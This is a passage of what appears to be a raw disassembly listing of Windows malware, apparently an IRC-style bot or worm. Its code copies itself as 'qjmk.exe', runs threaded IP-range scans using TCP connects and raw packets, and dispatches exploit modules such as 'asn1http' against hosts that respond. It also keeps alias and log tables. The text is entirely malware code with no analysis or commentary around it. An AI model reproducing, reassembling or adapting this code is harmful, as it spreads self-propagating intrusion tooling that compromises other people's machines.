push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4010D2
lea eax, [ebp+var_200]
push eax
call sub_401014
add esp, 18h
leave
retn
sub_4035CD endp
; ---------------------------------------------------------------------------
db 1Dh dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403661 proc near ; CODE XREF: sub_40123A�j
var_210 = dword ptr -210h
var_204 = byte ptr -204h
var_4 = byte ptr -4
arg_10 = byte ptr 18h
arg_90 = byte ptr 98h
arg_110 = dword ptr 118h
arg_130 = dword ptr 138h
arg_138 = dword ptr 140h
arg_13C = dword ptr 144h
push ebp
mov ebp, esp
sub esp, 204h
mov eax, [ebp+arg_130]
push ebx
cmp eax, 0FFFFFFFFh
push esi
jz loc_4039F1
imul eax, 3Ch
xor ebx, ebx
cmp dword_42AF34[eax], ebx
jz loc_4038D2
push 4
call sub_4010E6
test eax, eax
pop ecx
jnz loc_4039F1
mov eax, dword_42C920
push edi
mov edi, offset dword_43807C
push 104h
push edi
push ebx
mov dword_43828C, eax
mov dword_438288, ebx
call ds:dword_495330 ; GetModuleFileNameA
push 103h
mov esi, offset dword_438180
push offset aQjmk_exe ; "qjmk.exe"
push esi
call sub_416A10
mov eax, [ebp+arg_110]
add esp, 0Ch
cmp [ebp+arg_90], bl
mov dword_438078, eax
mov eax, [ebp+arg_138]
push 7Fh
mov dword_438310, eax
jnz short loc_403714
lea eax, [ebp+arg_10]
push eax
push offset dword_438290
call sub_416A10
add esp, 0Ch
mov dword_438314, 1
jmp short loc_40372E
; ---------------------------------------------------------------------------
loc_403714: ; CODE XREF: sub_403661+94�j
lea eax, [ebp+arg_90]
push eax
push offset dword_438290
call sub_416A10
add esp, 0Ch
mov dword_438314, ebx
loc_40372E: ; CODE XREF: sub_403661+B1�j
push esi
push edi
push dword_43828C
lea eax, [ebp+var_204]
push offset dword_42B498
push eax
call sub_416821
push ebx
lea eax, [ebp+var_204]
push 4
push eax
call sub_40105F
add esp, 20h
mov dword_438284, eax
lea eax, [ebp+var_4]
push eax
push ebx
push offset dword_438078
push offset sub_4012EE
push ebx
push ebx
call ds:dword_49532C ; CreateThread
mov ecx, dword_438284
imul ecx, 234h
cmp eax, ebx
mov dword_43E934[ecx], eax
jz short loc_40379D
loc_40378B: ; CODE XREF: sub_403661+13A�j
cmp dword_438318, ebx
jnz short loc_4037B8
push 32h
call ds:dword_495324 ; Sleep
jmp short loc_40378B
; ---------------------------------------------------------------------------
loc_40379D: ; CODE XREF: sub_403661+128�j
call ds:dword_495328 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_204]
push offset dword_42B450
push eax
call sub_416821
add esp, 0Ch
loc_4037B8: ; CODE XREF: sub_403661+130�j
lea eax, [ebp+var_204]
push eax
call sub_401014
mov edi, offset dword_4386D4
mov [esp+210h+var_210], 104h
push edi
push ebx
mov dword_4388E0, ebx
call ds:dword_495330 ; GetModuleFileNameA
push 103h
mov esi, offset dword_4387D8
push offset aQjmk_exe ; "qjmk.exe"
push esi
call sub_416A10
mov eax, [ebp+arg_110]
add esp, 0Ch
cmp [ebp+arg_90], bl
mov dword_4386D0, eax
mov eax, [ebp+arg_138]
push 7Fh
mov dword_438968, eax
jnz short loc_403833
lea eax, [ebp+arg_10]
push eax
push offset dword_4388E8
call sub_416A10
add esp, 0Ch
mov dword_43896C, 1
jmp short loc_40384D
; ---------------------------------------------------------------------------
loc_403833: ; CODE XREF: sub_403661+1B3�j
lea eax, [ebp+arg_90]
push eax
push offset dword_4388E8
call sub_416A10
add esp, 0Ch
mov dword_43896C, ebx
loc_40384D: ; CODE XREF: sub_403661+1D0�j
push esi
push edi
push dword_4388E4
lea eax, [ebp+var_204]
push offset unk_42B3F8
push eax
call sub_416821
push ebx
lea eax, [ebp+var_204]
push 5
push eax
call sub_40105F
add esp, 20h
mov dword_4388DC, eax
lea eax, [ebp+var_4]
push eax
push ebx
push offset dword_4386D0
push offset off_40126C
push ebx
push ebx
call ds:dword_49532C ; CreateThread
mov ecx, dword_4388DC
pop edi
imul ecx, 234h
cmp eax, ebx
mov dword_43E934[ecx], eax
jz short loc_4038C1
loc_4038AB: ; CODE XREF: sub_403661+25E�j
cmp dword_438970, ebx
jnz loc_4039E4
push 32h
call ds:dword_495324 ; Sleep
jmp short loc_4038AB
; ---------------------------------------------------------------------------
loc_4038C1: ; CODE XREF: sub_403661+248�j
call ds:dword_495328 ; RtlGetLastWin32Error
push eax
push offset unk_42B3B4
jmp loc_4039D5
; ---------------------------------------------------------------------------
loc_4038D2: ; CODE XREF: sub_403661+25�j
cmp dword_42AF38[eax], ebx
jz loc_4039F1
push 3
call sub_4010E6
test eax, eax
pop ecx
jnz loc_4039F1
mov esi, offset dword_4385AC
push 104h
push esi
push ebx
call ds:dword_495330 ; GetModuleFileNameA
push 5Ch
push esi
call sub_4169E0
pop ecx
cmp eax, ebx
pop ecx
jz short loc_403910
mov [eax], bl
loc_403910: ; CODE XREF: sub_403661+2AB�j
mov eax, dword_42C924
mov dword_4386C4, ebx
mov dword_4386B0, eax
lea eax, [ebp+arg_10]
push eax
push offset dword_438324
call sub_416821
mov eax, [ebp+arg_110]
pop ecx
pop ecx
mov dword_438320, eax
mov ecx, [ebp+arg_138]
push esi
push dword_4386B0
mov dword_4386BC, ecx
mov ecx, [ebp+arg_13C]
push eax
mov dword_4386C0, ecx
call sub_401299
pop ecx
push eax
lea eax, [ebp+var_204]
push offset unk_42B360
push eax
call sub_416821
push ebx
lea eax, [ebp+var_204]
push 3
push eax
call sub_40105F
add esp, 20h
mov dword_4386B8, eax
lea eax, [ebp+var_4]
push eax
push ebx
push offset dword_438320
push offset sub_4012F8
push ebx
push ebx
call ds:dword_49532C ; CreateThread
mov ecx, dword_4386B8
imul ecx, 234h
cmp eax, ebx
mov dword_43E934[ecx], eax
jz short loc_4039C9
loc_4039B7: ; CODE XREF: sub_403661+366�j
cmp dword_4386CC, ebx
jnz short loc_4039E4
push 32h
call ds:dword_495324 ; Sleep
jmp short loc_4039B7
; ---------------------------------------------------------------------------
loc_4039C9: ; CODE XREF: sub_403661+354�j
call ds:dword_495328 ; RtlGetLastWin32Error
push eax
push offset unk_42B318
loc_4039D5: ; CODE XREF: sub_403661+26C�j
lea eax, [ebp+var_204]
push eax
call sub_416821
add esp, 0Ch
loc_4039E4: ; CODE XREF: sub_403661+250�j
; sub_403661+35C�j
lea eax, [ebp+var_204]
push eax
call sub_401014
pop ecx
loc_4039F1: ; CODE XREF: sub_403661+14�j
; sub_403661+35�j ...
pop esi
pop ebx
leave
retn
sub_403661 endp
; ---------------------------------------------------------------------------
db 0E5h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403ADA proc near ; CODE XREF: sub_4012DA�j
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
push esi
push 4
lea esi, ds:4370C0h[eax*8]
lea eax, [ebp+arg_0]
push esi
push eax
call sub_415960
add esp, 0Ch
push [ebp+arg_0]
call dword_491590 ; htonl
inc eax
push eax
mov [ebp+arg_0], eax
call dword_491658 ; htonl
mov [ebp+arg_0], eax
lea eax, [ebp+arg_0]
push 4
push eax
push esi
call sub_415960
mov eax, [esi]
add esp, 0Ch
pop esi
pop ebp
retn
sub_403ADA endp
; ---------------------------------------------------------------------------
db 12h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403B34 proc near ; CODE XREF: sub_401023�j
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push esi
or esi, 0FFFFFFFFh
push [ebp+arg_0]
mov [ebp+var_C], esi
mov [ebp+var_8], esi
mov [ebp+var_4], esi
mov [ebp+var_10], esi
call sub_4158E0
cmp eax, 0Fh
pop ecx
jbe short loc_403B5C
xor eax, eax
jmp short loc_403BCD
; ---------------------------------------------------------------------------
loc_403B5C: ; CODE XREF: sub_403B34+22�j
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_C]
push eax
push offset aD_D_D_D ; "%d.%d.%d.%d"
push [ebp+arg_0]
call sub_416B36
add esp, 18h
cmp [ebp+var_C], esi
jnz short loc_403B89
call sub_416B18
mov [ebp+var_C], eax
loc_403B89: ; CODE XREF: sub_403B34+4B�j
cmp [ebp+var_8], esi
jnz short loc_403B96
call sub_416B18
mov [ebp+var_8], eax
loc_403B96: ; CODE XREF: sub_403B34+58�j
cmp [ebp+var_4], esi
jnz short loc_403BA3
call sub_416B18
mov [ebp+var_4], eax
loc_403BA3: ; CODE XREF: sub_403B34+65�j
mov eax, [ebp+var_10]
cmp eax, esi
jnz short loc_403BAF
call sub_416B18
loc_403BAF: ; CODE XREF: sub_403B34+74�j
shl eax, 8
add eax, [ebp+var_4]
mov ecx, [ebp+var_C]
shl eax, 8
add eax, [ebp+var_8]
shl eax, 8
add eax, ecx
mov ecx, [ebp+arg_4]
mov dword_4370C0[ecx*8], eax
loc_403BCD: ; CODE XREF: sub_403B34+26�j
pop esi
leave
retn
sub_403B34 endp
; ---------------------------------------------------------------------------
db 27h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403BF7 proc near ; CODE XREF: sub_4012A8�j
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 120h
push ebx
push esi
push edi
push 1
pop edi
xor ebx, ebx
push ebx
push edi
push 2
mov [ebp+var_4], edi
call dword_4916DC ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_403C20
xor eax, eax
jmp short loc_403C8F
; ---------------------------------------------------------------------------
loc_403C20: ; CODE XREF: sub_403BF7+23�j
mov eax, [ebp+arg_0]
push [ebp+arg_4]
mov [ebp+var_1C], 2
mov [ebp+var_18], eax
call dword_49165C ; htons
mov [ebp+var_1A], ax
lea eax, [ebp+var_4]
push eax
push 8004667Eh
push esi
call dword_4916F8 ; ioctlsocket
lea eax, [ebp+var_1C]
push 10h
push eax
push esi
call dword_491604 ; connect
mov eax, [ebp+arg_8]
mov [ebp+var_8], ebx
mov [ebp+var_C], eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_120]
push ebx
push eax
push ebx
push ebx
mov [ebp+var_11C], esi
mov [ebp+var_120], edi
call dword_491644 ; select
push esi
mov edi, eax
call dword_4916F4 ; closesocket
xor eax, eax
cmp edi, ebx
setnle al
loc_403C8F: ; CODE XREF: sub_403BF7+27�j
pop edi
pop esi
pop ebx
leave
retn
sub_403BF7 endp
; ---------------------------------------------------------------------------
db 27h dup(0CCh)
; ---------------------------------------------------------------------------
loc_403CBB: ; CODE XREF: .text:0040100A�j
push ebp
mov ebp, esp
mov eax, 10110h
call sub_416880
push ebx
push esi
push edi
mov edi, 2649h
push edi
call dword_49165C ; htons
push dword ptr [ebp+10h]
mov [ebp-28h], ax
call dword_49165C ; htons
mov [ebp-26h], ax
call sub_416B18
xor ebx, ebx
push 200h
mov [ebp-24h], eax
mov [ebp-20h], ebx
mov [ebp-1Ch], bx
mov [ebp-0Ch], bx
mov word ptr [ebp-1Ah], 5
mov [ebp-18h], bx
mov word ptr [ebp-16h], 1
mov [ebp-14h], bx
mov [ebp-12h], bx
mov [ebp-10h], bx
mov [ebp-0Eh], bx
call dword_49165C ; htons
mov esi, [ebp+0Ch]
mov [ebp-0Ah], ax
mov eax, [ebp+8]
push 24h
mov [ebp-8], bx
mov [ebp-6], bx
mov [ebp-58h], eax
mov [ebp-54h], esi
mov [ebp-50h], bl
mov byte ptr [ebp-4Fh], 6
call dword_49165C ; htons
mov [ebp-4Eh], ax
lea eax, [ebp-28h]
push 24h
push eax
lea eax, [ebp-4Ch]
push eax
call sub_415960
lea eax, [ebp-58h]
push 20h
push eax
call sub_40120D
mov [ebp-8], ax
push 10h
lea eax, [ebp-38h]
push ebx
push eax
call sub_415CA0
add esp, 20h
mov word ptr [ebp-38h], 2
push dword ptr [ebp+10h]
call dword_49165C ; htons
push 6
push 3
push 2
mov [ebp-36h], ax
mov [ebp-34h], esi
mov dword ptr [ebp-4], 10h
call dword_4916DC ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_403DBA
push offset aSocketOpenFail ; "socket open failed"
jmp loc_403E7B
; ---------------------------------------------------------------------------
loc_403DBA: ; CODE XREF: .text:00403DAE�j
push dword ptr [ebp-4]
lea eax, [ebp-38h]
push eax
push ebx
lea eax, [ebp-28h]
push 24h
push eax
push esi
call dword_4916C0 ; sendto
cmp eax, 14h
mov [ebp+10h], eax
jz short loc_403E03
call dword_4915F0 ; WSAGetLastError
push eax
lea eax, [ebp-0D8h]
push dword ptr [ebp+10h]
push offset aSendtoSocketFa ; "sendto() socket failed. sent = %d <%d>."...
push eax
call sub_416821
lea eax, [ebp-0D8h]
push eax
call sub_401014
add esp, 14h
jmp short loc_403E4C
; ---------------------------------------------------------------------------
loc_403E03: ; CODE XREF: .text:00403DD5�j
push 10038h
lea eax, [ebp-10110h]
push ebx
push eax
call sub_415CA0
add esp, 0Ch
loc_403E18: ; CODE XREF: .text:00403E3F�j
cmp [ebp-100FAh], di
jz short loc_403E55
lea eax, [ebp-4]
push eax
lea eax, [ebp-38h]
push eax
push ebx
lea eax, [ebp-10110h]
push 10038h
push eax
push esi
call dword_491634 ; recvfrom
test eax, eax
jge short loc_403E18
push offset aRecvfromSocket ; "recvfrom() socket failed"
call sub_401014
pop ecx
loc_403E4C: ; CODE XREF: .text:00403E01�j
push esi
call dword_4916F4 ; closesocket
jmp short loc_403E81
; ---------------------------------------------------------------------------
loc_403E55: ; CODE XREF: .text:00403E1F�j
push esi
call dword_4916F4 ; closesocket
cmp word ptr [ebp-100EAh], 1
jnz short loc_403E76
push offset aSocketOpen_ ; "Socket open."
call sub_401014
pop ecx
push 1
pop eax
jmp short loc_403E83
; ---------------------------------------------------------------------------
loc_403E76: ; CODE XREF: .text:00403E64�j
push offset aSocketClosed_ ; "Socket closed."
loc_403E7B: ; CODE XREF: .text:00403DB5�j
call sub_401014
pop ecx
loc_403E81: ; CODE XREF: .text:00403E53�j
xor eax, eax
loc_403E83: ; CODE XREF: .text:00403E74�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
db 73h dup(0CCh)
; ---------------------------------------------------------------------------
loc_403EFB: ; CODE XREF: sub_4012D5�j
push ebp
mov ebp, esp
sub esp, 28Ch
mov eax, [ebp+8]
push ebx
push esi
push edi
push 53h
mov esi, eax
pop ecx
lea edi, [ebp-150h]
rep movsd
mov esi, [ebp-2Ch]
mov dword ptr [eax+148h], 1
mov eax, [ebp-28h]
mov [ebp-4], esi
mov [ebp+8], eax
call ds:dword_495340 ; GetTickCount
push eax
call sub_416B0E
mov ebx, esi
pop ecx
imul ebx, 234h
loc_403F42: ; CODE XREF: .text:004040FB�j
mov eax, dword_43E924[ebx]
cmp dword_4370C4[eax*8], 0
jz loc_404100
cmp dword ptr [ebp-10h], 0
push eax
jz short loc_403F6C
lea eax, [ebp-150h]
push eax
call sub_401023
pop ecx
jmp short loc_403F71
; ---------------------------------------------------------------------------
loc_403F6C: ; CODE XREF: .text:00403F5B�j
call sub_4012DA
loc_403F71: ; CODE XREF: .text:00403F6A�j
pop ecx
mov edi, eax
push dword ptr [ebp+8]
push dword_43E924[ebx]
push dword ptr [ebp-3Ch]
push edi
call dword_4916E8 ; inet_ntoa
push eax
lea eax, [ebp-28Ch]
push offset dword_42B5C4
push eax
call sub_416821
lea eax, [ebp-28Ch]
push eax
lea eax, dword_43E720[ebx]
push eax
call sub_416821
push dword ptr [ebp-38h]
push dword ptr [ebp-3Ch]
push edi
call sub_4012A8
add esp, 2Ch
cmp eax, 1
jnz loc_4040F0
cmp dword ptr [ebp-20h], 0FFFFFFFFh
jnz short loc_404045
push offset dword_438060
call ds:dword_49533C ; RtlEnterCriticalSection
push dword ptr [ebp-3Ch]
push edi
call dword_4916E8 ; inet_ntoa
push eax
lea eax, [ebp-28Ch]
push offset dword_42B58C
push eax
call sub_416821
add esp, 10h
cmp dword ptr [ebp-14h], 0
jnz short loc_404027
cmp byte ptr [ebp-0C0h], 0
push 1
push dword ptr [ebp-18h]
lea eax, [ebp-28Ch]
push eax
lea eax, [ebp-0C0h]
jnz short loc_40401B
lea eax, [ebp-140h]
loc_40401B: ; CODE XREF: .text:00404013�j
push eax
push dword ptr [ebp-40h]
call sub_4010D2
add esp, 14h
loc_404027: ; CODE XREF: .text:00403FF8�j
lea eax, [ebp-28Ch]
push eax
call sub_401014
mov dword ptr [esp], offset dword_438060
call ds:dword_495338 ; RtlLeaveCriticalSection
jmp loc_4040F0
; ---------------------------------------------------------------------------
loc_404045: ; CODE XREF: .text:00403FC8�j
push edi
call dword_4916E8 ; inet_ntoa
push eax
lea eax, [ebp-208h]
push eax
call sub_416821
mov eax, [ebp-20h]
imul eax, 3Ch
add eax, offset aAsn1http_0 ; "asn1http"
push eax
lea eax, [ebp-178h]
push eax
call sub_416821
add esp, 10h
cmp byte ptr [ebp-0C0h], 0
lea eax, [ebp-0C0h]
jnz short loc_404089
lea eax, [ebp-140h]
loc_404089: ; CODE XREF: .text:00404081�j
push eax
lea eax, [ebp-1F8h]
push eax
call sub_416821
mov eax, [ebp-40h]
pop ecx
mov [ebp-20Ch], eax
mov eax, [ebp-18h]
mov [ebp-15Ch], eax
mov eax, [ebp-14h]
mov [ebp-158h], eax
mov eax, [ebp-3Ch]
mov [ebp-16Ch], eax
mov eax, [ebp-20h]
pop ecx
mov [ebp-164h], eax
imul eax, 3Ch
sub esp, 0BCh
mov [ebp-168h], esi
lea esi, [ebp-20Ch]
push 2Fh
pop ecx
mov edi, esp
rep movsd
call off_42AF2C[eax]
mov esi, [ebp-4]
add esp, 0BCh
loc_4040F0: ; CODE XREF: .text:00403FBE�j
; .text:00404040�j
push 7D0h
call ds:dword_495324 ; Sleep
jmp loc_403F42
; ---------------------------------------------------------------------------
loc_404100: ; CODE XREF: .text:00403F50�j
push esi
call sub_4012A3
pop ecx
push 0
call ds:dword_495334 ; ExitThread
; ---------------------------------------------------------------------------
db 85h dup(0CCh)
; ---------------------------------------------------------------------------
loc_404194: ; CODE XREF: .text:loc_401366�j
push ebp
mov ebp, esp
sub esp, 1CCh
mov eax, [ebp+8]
push ebx
push esi
push edi
push 53h
mov esi, eax
pop ecx
lea edi, [ebp-14Ch]
push 1
pop ebx
rep movsd
mov [eax+144h], ebx
lea eax, [ebp-14Ch]
push eax
call dword_49169C ; inet_addr
mov ecx, [ebp-2Ch]
sub esp, 14Ch
lea esi, [ebp-14Ch]
push 53h
mov dword_4370C0[ecx*8], eax
pop ecx
mov edi, esp
rep movsd
call sub_40123A
push 8
call sub_4010E6
add esp, 150h
cmp eax, ebx
jnz short loc_404262
mov esi, offset dword_438060
push esi
call ds:dword_495348 ; RtlDeleteCriticalSection
push 80000400h
push esi
call ds:dword_495344 ; InitializeCriticalSectionAndSpinCount
test eax, eax
jnz short loc_404262
lea eax, [ebp-1CCh]
push offset dword_42B708
push eax
call sub_416821
xor ebx, ebx
pop ecx
cmp [ebp-10h], ebx
pop ecx
jnz short loc_40424C
push ebx
lea eax, [ebp-1CCh]
push dword ptr [ebp-14h]
push eax
lea eax, [ebp-13Ch]
push eax
push dword ptr [ebp-3Ch]
call sub_4010D2
add esp, 14h
loc_40424C: ; CODE XREF: .text:0040422D�j
lea eax, [ebp-1CCh]
push eax
call sub_401014
pop ecx
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_404262: ; CODE XREF: .text:004041F7�j
; .text:00404213�j
mov eax, [ebp-2Ch]
mov esi, ds:dword_495324
mov edi, ebx
mov dword_4370C4[eax*8], ebx
xor ebx, ebx
cmp dword ptr [ebp-20h], 1
jb loc_40432F
loc_404280: ; CODE XREF: .text:00404329�j
push edi
lea eax, [ebp-14Ch]
push dword ptr [ebp-2Ch]
mov [ebp-24h], edi
push dword ptr [ebp-38h]
push eax
lea eax, [ebp-1CCh]
push offset dword_42B6BC
push eax
call sub_416821
push ebx
lea eax, [ebp-1CCh]
push 8
push eax
call sub_40105F
mov [ebp-28h], eax
imul eax, 234h
mov ecx, [ebp-2Ch]
add esp, 24h
mov dword_43E924[eax], ecx
lea eax, [ebp-14Ch]
push ebx
push ebx
push eax
push offset sub_4012D5
push ebx
push ebx
call ds:dword_49532C ; CreateThread
mov ecx, [ebp-28h]
imul ecx, 234h
cmp eax, ebx
mov dword_43E934[ecx], eax
jz short loc_4042FA
loc_4042EF: ; CODE XREF: .text:004042F8�j
cmp [ebp-4], ebx
jnz short loc_404321
push 1Eh
call esi ; Sleep
jmp short loc_4042EF
; ---------------------------------------------------------------------------
loc_4042FA: ; CODE XREF: .text:004042ED�j
call ds:dword_495328 ; RtlGetLastWin32Error
push eax
lea eax, [ebp-1CCh]
push offset dword_42B66C
push eax
call sub_416821
lea eax, [ebp-1CCh]
push eax
call sub_401014
add esp, 10h
loc_404321: ; CODE XREF: .text:004042F2�j
push 1Eh
call esi ; Sleep
inc edi
cmp edi, [ebp-20h]
jbe loc_404280
loc_40432F: ; CODE XREF: .text:0040427A�j
cmp [ebp-30h], ebx
jz loc_4043D9
mov eax, [ebp-30h]
imul eax, 0EA60h
push eax
call esi ; Sleep
loc_404344: ; CODE XREF: .text:004043E4�j
push dword ptr [ebp-30h]
mov eax, [ebp-2Ch]
push dword ptr [ebp-38h]
mov eax, dword_4370C0[eax*8]
push eax
call dword_4916E8 ; inet_ntoa
push eax
lea eax, [ebp-1CCh]
push offset dword_42B614
push eax
call sub_416821
add esp, 14h
cmp [ebp-10h], ebx
jnz short loc_404392
push ebx
lea eax, [ebp-1CCh]
push dword ptr [ebp-14h]
push eax
lea eax, [ebp-13Ch]
push eax
push dword ptr [ebp-3Ch]
call sub_4010D2
add esp, 14h
loc_404392: ; CODE XREF: .text:00404373�j
lea eax, [ebp-1CCh]
push eax
call sub_401014
mov eax, [ebp-2Ch]
mov dword ptr [esp], 0BB8h
mov dword_4370C4[eax*8], ebx
call esi ; Sleep
push 8
call sub_4010E6
cmp eax, 1
pop ecx
jnz short loc_4043C9
push offset dword_438060
call ds:dword_495348 ; RtlDeleteCriticalSection
loc_4043C9: ; CODE XREF: .text:004043BC�j
push dword ptr [ebp-2Ch]
call sub_4012A3
pop ecx
push ebx
call ds:dword_495334 ; ExitThread
loc_4043D9: ; CODE XREF: .text:00404332�j
; .text:004043F1�j
mov eax, [ebp-2Ch]
cmp dword_4370C4[eax*8], 1
jnz loc_404344
push 7D0h
call esi ; Sleep
jmp short loc_4043D9
; ---------------------------------------------------------------------------
db 97h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40448A proc near ; CODE XREF: sub_401037�j
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push esi
push edi
mov esi, offset dword_43DBA0
mov edi, 0B8h
loc_40449E: ; CODE XREF: sub_40448A+33�j
cmp byte ptr [esi], 0
jz short loc_4044C1
push [ebp+arg_0]
push esi
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz short loc_4044C1
inc [ebp+var_4]
add esi, edi
cmp esi, offset dword_43E720
jl short loc_40449E
jmp short loc_404503
; ---------------------------------------------------------------------------
loc_4044C1: ; CODE XREF: sub_40448A+17�j
; sub_40448A+26�j
mov esi, [ebp+var_4]
push ebx
imul esi, 0B8h
push edi
push 0
lea ebx, dword_43DBA0[esi]
push ebx
call sub_415CA0
push 17h
push [ebp+arg_0]
push ebx
call sub_416A10
push 9Fh
lea eax, dword_43DBB8[esi]
push [ebp+arg_4]
push eax
call sub_416A10
add esp, 24h
inc dword_42CCB0
pop ebx
loc_404503: ; CODE XREF: sub_40448A+35�j
mov eax, [ebp+var_4]
pop edi
pop esi
leave
retn
sub_40448A endp
; ---------------------------------------------------------------------------
db 20h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40452A proc near ; CODE XREF: sub_401028�j
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
push esi
push edi
push 0
push [ebp+arg_8]
push offset aAliasList ; "-[Alias List]-"
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4010D2
add esp, 14h
xor edi, edi
mov esi, offset dword_43DBA0
loc_404554: ; CODE XREF: sub_40452A+72�j
cmp byte ptr [esi], 0
jz short loc_40458F
lea eax, [esi+18h]
push eax
push esi
push edi
push offset aD_SS ; "%d. %s = %s"
lea eax, [ebp+var_200]
push 200h
push eax
call sub_4163D7
push 1
lea eax, [ebp+var_200]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4010D2
add esp, 2Ch
loc_40458F: ; CODE XREF: sub_40452A+2D�j
add esi, 0B8h
inc edi
cmp esi, offset dword_43E720
jl short loc_404554
pop edi
pop esi
leave
retn
sub_40452A endp
; ---------------------------------------------------------------------------
db 1Eh dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4045C0 proc near ; CODE XREF: sub_401014�j
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = word ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
lea eax, [ebp+var_10]
push edi
push eax
call ds:dword_49534C ; GetLocalTime
mov ebx, offset dword_43CE6C
mov edi, 80h
mov esi, offset dword_438E6C
loc_4045E2: ; CODE XREF: sub_4045C0+3D�j
cmp byte ptr [ebx], 0
jz short loc_4045F9
push 7Fh
lea eax, [ebx+80h]
push ebx
push eax
call sub_416A10
add esp, 0Ch
loc_4045F9: ; CODE XREF: sub_4045C0+25�j
sub ebx, edi
cmp ebx, esi
jge short loc_4045E2
movzx eax, [ebp+var_4]
push [ebp+arg_0]
push eax
movzx eax, [ebp+var_6]
push eax
movzx eax, [ebp+var_8]
push eax
movzx eax, [ebp+var_10]
push eax
movzx eax, [ebp+var_A]
push eax
movzx eax, [ebp+var_E]
push eax
push offset a_2d_2d4d_2d_2d ; "[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s"
push edi
push esi
call sub_4163D7
add esp, 28h
pop edi
pop esi
pop ebx
leave
retn
sub_4045C0 endp
; ---------------------------------------------------------------------------
db 1Dh dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404651 proc near ; CODE XREF: sub_4012B2�j
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 80h
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_80]
push [ebp+arg_0]
push 80h
push eax
call sub_416BF4
lea eax, [ebp+var_80]
push eax
call sub_401014
add esp, 14h
leave
retn
sub_404651 endp
; ---------------------------------------------------------------------------
db 0Bh dup(0CCh)
; ---------------------------------------------------------------------------
loc_404688: ; CODE XREF: .text:00401104�j
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
xor ebx, ebx
cmp [ebp+14h], ebx
push esi
mov dword ptr [ebp-8], 80h
mov [ebp-4], ebx
jnz short loc_4046B7
push ebx
push dword ptr [ebp+10h]
push offset aLogs ; "-[Logs]-"
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_4010D2
add esp, 14h
loc_4046B7: ; CODE XREF: .text:0040469E�j
cmp [ebp+18h], ebx
jz short loc_4046CF
push dword ptr [ebp+18h]
call sub_416CCF
cmp eax, ebx
pop ecx
mov [ebp-4], eax
jz short loc_4046CF
mov [ebp-8], eax
loc_4046CF: ; CODE XREF: .text:004046BA�j
; .text:004046CA�j
mov [ebp+14h], ebx
mov esi, offset dword_438E6C
loc_4046D7: ; CODE XREF: .text:0040471F�j
mov eax, [ebp+14h]
cmp eax, [ebp-8]
jge short loc_404721
cmp [esi], bl
jz short loc_404710
cmp [ebp+18h], ebx
jz short loc_4046FC
cmp [ebp-4], ebx
jnz short loc_4046FC
push dword ptr [ebp+18h]
push esi
call sub_40121C
pop ecx
test eax, eax
pop ecx
jz short loc_404710
loc_4046FC: ; CODE XREF: .text:004046E6�j
; .text:004046EB�j
push 1
push dword ptr [ebp+10h]
push esi
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_4010D2
add esp, 14h
loc_404710: ; CODE XREF: .text:004046E1�j
; .text:004046FA�j
inc dword ptr [ebp+14h]
add esi, 80h
cmp esi, offset dword_43CE6C
jl short loc_4046D7
loc_404721: ; CODE XREF: .text:004046DD�j
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
db 27h dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_40474C proc near ; CODE XREF: sub_4010AF�j
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
mov eax, offset dword_438E6C
xor ecx, ecx
loc_404753: ; CODE XREF: sub_40474C+13�j
mov [eax], cl
add eax, 80h
cmp eax, offset dword_43CE6C
jl short loc_404753
cmp [esp+arg_C], ecx
push esi
